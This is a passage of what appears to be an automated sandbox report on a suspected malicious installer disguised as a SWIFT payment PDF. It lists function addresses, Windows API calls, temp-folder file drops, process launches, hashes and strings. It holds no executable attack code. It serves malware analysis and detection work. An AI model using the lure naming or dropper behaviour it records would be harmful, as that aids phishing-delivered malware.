                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$Epicurize Setup: Installing
                                      • API String ID: 3540041739-960351846
                                      • Opcode ID: 474395ea6faa9e18b1b5e0ae74fba140c7d1b20ae92ef33f0ec5adb6ffe99bf7
                                      • Instruction ID: 808364b1aeea65b13bf83ed040d55ad759ad6ec36480b824a7a4bb04bc91d3c3
                                      • Opcode Fuzzy Hash: 474395ea6faa9e18b1b5e0ae74fba140c7d1b20ae92ef33f0ec5adb6ffe99bf7
                                      • Instruction Fuzzy Hash: 8B1108736002243BDB0065699C06EEF329DDBC3375F14023BFA29F61D1E9799C5182E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                      • Opcode Fuzzy Hash: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004038E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowTextA.USER32(00000000,007A1F00), ref: 0040397F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$1033$Epicurize Setup: Installing
                                      • API String ID: 530164218-565599772
                                      • Opcode ID: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                      • Instruction ID: 3eeb35b712935f7be9db67fea1ba5421606f6b55dcd8c4013f5d2095cba695b6
                                      • Opcode Fuzzy Hash: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                      • Instruction Fuzzy Hash: 121108B1B046009BC721AF19CC809333BADEBC6756318823FED01673A1D77D9D028B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405624 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 0040562A
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405633
                                      • lstrcatA.KERNEL32(?,00409014), ref: 00405644
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405624
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3355392842
                                      • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                      • Instruction ID: 00b6ae861ddc274f1a22631493032202eb54a79e67bc778d52c9d7871f0e19dd
                                      • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                      • Instruction Fuzzy Hash: C8D0A962A099302ED20226158C05EDB3A98CF02315B040873F200B22E2C67C2D418BFE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      • Opcode ID: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction ID: d9cf4706ccd720fe68a9057b37b388a6d3cc99dc36037c8cf20abe177969b22e
                                      • Opcode Fuzzy Hash: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction Fuzzy Hash: 02117071900108BEDB01EFA5DD81DAEBBB9EF04344B20807AF505F61E2D7789E54DB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004056BD Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                      • CharNextA.USER32(00000000), ref: 004056D0
                                      • CharNextA.USER32(00000000), ref: 004056E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: outvillain\faber.div
                                      • API String ID: 3213498283-1876387199
                                      • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                      • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402BCF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                      • GetTickCount.KERNEL32 ref: 00402C00
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction ID: d1c4e1838bfb856cd6d3ea9dd85ee240d54de3540c59ddf7a57925f8cf4fbe18
                                      • Opcode Fuzzy Hash: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction Fuzzy Hash: 52F0D030909620BFC6616F18BD4CE5F7BA4E745B117518467F204A11A5D27CA8838FAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004024CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll, xrefs: 004024DB, 00402500
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileWritelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
                                      • API String ID: 427699356-1035503177
                                      • Opcode ID: 071ff9b93a967e41d10e7cb0e14db62d4ae7f43003ce44969fa16f51b87b1945
                                      • Instruction ID: d4cad745c1bb7ae9502ce82199ca69f85842da8443a3b9b3f3b852b520f082a9
                                      • Opcode Fuzzy Hash: 071ff9b93a967e41d10e7cb0e14db62d4ae7f43003ce44969fa16f51b87b1945
                                      • Instruction Fuzzy Hash: 4CF0E272A44245BFDB00EBA08E4AAAB3668CB01308F10843FB101F50C2D5FC99419B2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405347 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 0040536C
                                      • CloseHandle.KERNEL32(?), ref: 00405379
                                      Strings
                                      • Error launching installer, xrefs: 0040535A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                      • Instruction ID: f3300c01cb1876a67fd1897e7389f13c8369481b1b26804573fe4f9c45dca3ad
                                      • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                      • Instruction Fuzzy Hash: 22E0ECB4900209AFDB009F64DC09E6F7BBCFB00344F40CA21BD11E2150F778E9108AA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040358D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75EE3410,00403565,004033A9,?), ref: 004035A7
                                      • GlobalFree.KERNEL32(0085EA98), ref: 004035AE
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040359F
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-3355392842
                                      • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                      • Instruction ID: 25ceb6f6e8048fd8c7c72bafa6746df7c9a9eea5615397dbd2628d9726c916a8
                                      • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                      • Instruction Fuzzy Hash: 6EE08C32805020ABC6215F14AD0471AB6686B89B22F01406BE9407B2A087B8AD428BD8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040566B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405671
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 0040567F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-3370423016
                                      • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                      • Instruction ID: 066a61083934c2e15797617eaf2660ffc2c94803564b26df0c9315ada1aa8723
                                      • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                      • Instruction Fuzzy Hash: 38D0A762409D702EF30352108C04BEF6A88CF12300F0904A2E440E21D0C2781C418BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

